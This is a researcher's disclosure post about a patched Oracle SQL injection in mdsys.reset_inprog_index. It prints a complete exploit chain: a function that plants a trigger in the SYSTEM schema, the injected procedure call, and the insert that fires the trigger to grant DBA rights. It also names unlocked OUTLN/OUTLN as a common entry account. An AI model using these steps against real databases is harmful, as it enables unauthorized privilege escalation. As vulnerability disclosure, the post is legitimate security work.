Oracle CPU Jan 2011

Oracle recently patched a vulnerability which I reported in 2009. The vulnerability was a SQL Injection in procedure mdsys.reset_inprog_index(). This procedure cannot be executed by public and when I reported this to Oracle the response was:

Our analysis shows that this issue cannot be exploited except by a user with DBA privileges.
Based on this analysis, we will not be creating a CPU fix and will close this issue as "Not a Security Bug".

Interestingly, this procedure is not in SYS or SYSTEM schema but in MDSYS schema. Thus any user with "execute any procedure" privilege will be able to execute/exploit it. Also, MDSYS user does not have the DBA role. So, can you become DBA?

Well, although MDSYS does not have DBA role it has "CREATE ANY TRIGGER" privilege and thus exploiting this will give DBA privileges (indirectly). Here is an example:

----------------------------------------------
lets assume that scott has execute any procedure privilege:

now scott creates a function such as:

create or replace function fn2 return int authid current_user is
pragma autonomous_transaction;
BEGIN
execute immediate 'create or replace trigger "SYSTEM".the_trigger2
before insert on  system.OL$ for each row BEGIN  SCOTT.Z();
dbms_output.put_line(''aa'');end ;';
return 1;
END;

than scott makes this function executable by public:

grant execute on scott.fn2 to public;

now since scott has execute any procedure privilege, he injects the function created above and make mdsys create a trigger in "system" schema:

begin
mdsys.reset_inprog_index('aa'' and scott.fn2()=1 and ''1''=''1','bbbbb');
end;

Since, public has insert privileges on system.OL$, he does:

insert into system.OL$ (OL_NAME) VALUES ('JOB Done');

this should make the system user execute the function SCOTT.Z() giving scott DBA privileges.
-----------------------------------------
This leaves the question, is getting DBA from "execute any procedure" privilege a big deal? Its not a big deal theoretically, but here is a real life example which i found in quite a few pentests in which i think this vulnerability has been quite handy.

Oracle 10g onwards lock all default accounts and hence the good old pwnage techniques like connecting with system/change_on_install doesnot really work that much anymore. However, one account which I see quite often in un-locked state is OUTLN/OUTLN (I have seen it unlocked even in a few 11g R2). This is not a default behavior but its common to see. These are the accounts which have "EXECUTE ANY PROCEDURE" privilege:

SYS EXECUTE ANY PROCEDURE
DBA EXECUTE ANY PROCEDURE
IMP_FULL_DATABASE EXECUTE ANY PROCEDURE
EXP_FULL_DATABASE EXECUTE ANY PROCEDURE
WMSYS EXECUTE ANY PROCEDURE
FLOWS_030000 EXECUTE ANY PROCEDURE
OUTLN EXECUTE ANY PROCEDURE
WKSYS EXECUTE ANY PROCEDURE
-------------------------------------
Summary: So, if you come across an Oracle database (11g R1, R2) with one of the above mentioned account in un-locked state, you can use this vulnerability to become DBA. In the end, Oracle decided to patch this and this won't work anymore after the Jan 2011 patch :(
-----------------